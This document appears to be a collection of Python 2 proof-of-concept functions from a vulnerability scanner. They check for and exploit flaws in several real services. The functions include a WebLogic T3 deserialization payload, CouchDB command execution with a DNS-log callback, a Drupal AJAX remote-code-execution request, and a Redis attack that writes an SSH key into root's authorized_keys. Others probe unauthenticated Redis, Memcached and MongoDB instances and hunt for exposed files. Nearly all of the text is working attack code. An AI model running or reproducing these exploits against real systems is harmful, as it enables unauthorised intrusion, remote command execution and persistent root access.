def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
socket.setdefaulttimeout(15)
if ':' in GetNetloc(url):
dport = int(GetNetloc(url).split(':')[1])
else:
dport = 7001
ip = DomainToIP(GetNetloc(url))
if ip == None:
return result
if ':' in ip:
dip = ip.split(':')[0]
else:
dip = ip
try:
index = 0
PAYLOAD = ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
if checkVul(rs,index):
result['success'] = True
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
if ':' in GetNetloc(url):
port = GetNetloc(url).split(':')[1]
else:
port = '5984'
ip = DomainToIP(GetNetloc(url))
if ip == None:
return result
if ':' in ip:
ip = ip.split(':')[0]
url = GetNetloc(ip + ':' + port, True)
version = GetVersion(url)
AddUser(url)
rangom_string = RandomString()
command = '"ping -n 2 %s"' % (rangom_string + '.' + conf.CEYE_DOMAIN)
CmeExec(url, command, version)
data = CheckDnsLog(rangom_string)
if data != False:
result['success'] = True
result['message'] = 'remote_addr:' + data[0][
'remote_addr'] + ' name: ' + data[0]['name']
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(3)
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
port = int(ip.split(':')[-1]) if ':' in ip else 6379
ip = DelPort(ip)
s = socket.socket()
s.connect((ip, port))
s.send(payload)
recvdata = s.recv(1024)
s.close()
if recvdata and 'redis_version' in recvdata:
result['success'] = True
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
socket.setdefaulttimeout(3)
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
port = int(ip.split(':')[-1]) if ':' in ip else 11211
ip = DelPort(ip)
payload = '\x73\x74\x61\x74\x73\x0a'
s = socket.socket()
s.connect((ip, port))
s.send(payload)
recvdata = s.recv(2048)
s.close()
if recvdata and 'STAT version' in recvdata:
result['success'] = True
result['message'] = 'version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
socket.setdefaulttimeout(5)
result = {}
result['success'] = False
result['message'] = ''
try:
random_str = RandomString()
url = GetNetloc(url, True)
target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]':
'echo ' + random_str + ' | tee ' + random_str + '.txt'
}
r = requests.post(target, data=payload, timeout=5)
if r.status_code != 200:
return result
else:
r = requests.get(url + '/' + random_str + '.txt', timeout=5)
if r.status_code == 200 and random_str == r.text.strip():
result['success'] = True
result['message'] = 'random_file: /' + random_str + '.txt'
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
init_url = url
public_key = '1'
if public_key == '':
raise PocErrorException(
'Poc:redis_sshkey_getshell Public_key is none! please input public_key.'
)
result = {}
result['success'] = False
result['message'] = ''
try:
url = GetNetloc(url)
url = DomainToIP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
if not CheckPort(ip, 22):
return result
r = redis.Redis(host=ip,
port=port,
db=0,
socket_timeout=2,
socket_connect_timeout=2)
if 'redis_version' in r.info():
key = RandomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key)
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
result['success'] = True
return result
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))
def GetRealURL(self):
while True:
if self.raw_queue.qsize() <= 0 and self.is_run == False:
break
try:
each = self.raw_queue.get(timeout=1)
req = requests.get(each, timeout=3)
domain = GetNetloc(req.url, True)
self.lock.acquire()
if domain not in self.domain_list:
self.result_list.append(req.url)
self.domain_list.append(domain)
self.OutPutStatus(str(len(self.result_list)),
str(self.raw_queue.qsize()))
self.lock.release()
except Exception, e:
pass
def Poc(url):
init_url = url
result = {}
result['success'] = False
result['message'] = ''
try:
url = GetNetloc(url)
ip = DomainToIP(url)
if ip == None:
return result
port = int(ip.split(':')[-1]) if ':' in ip else 27017
ip = DelPort(ip)
MONGO_URI = 'mongodb://'+ip+':'+str(port)+'/'
conn = pymongo.MongoClient(MONGO_URI, serverSelectionTimeoutMS=3000)
dbs = conn.database_names()
result['success'] = True
result['message'] = str(dbs)
return result
except Exception,e:
raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url):
init_url = url
result = {}
try:
data = ''
url = GetNetloc(url, True)
if CheckTargetAccess(url):
files = LoadDict(dict_path)
for file in files:
try:
file = file.strip()
res = requests.get(url[0:-1] + file, timeout=3)
except:
continue
if str(res.status_code).startswith('2'):
data = data + '\n' + file + ': ' + str(res.status_code)
if data:
result['weak_file'] = data
return result
except Exception, e:
raise PocWarningException(init_url, Info()['name'], repr(e))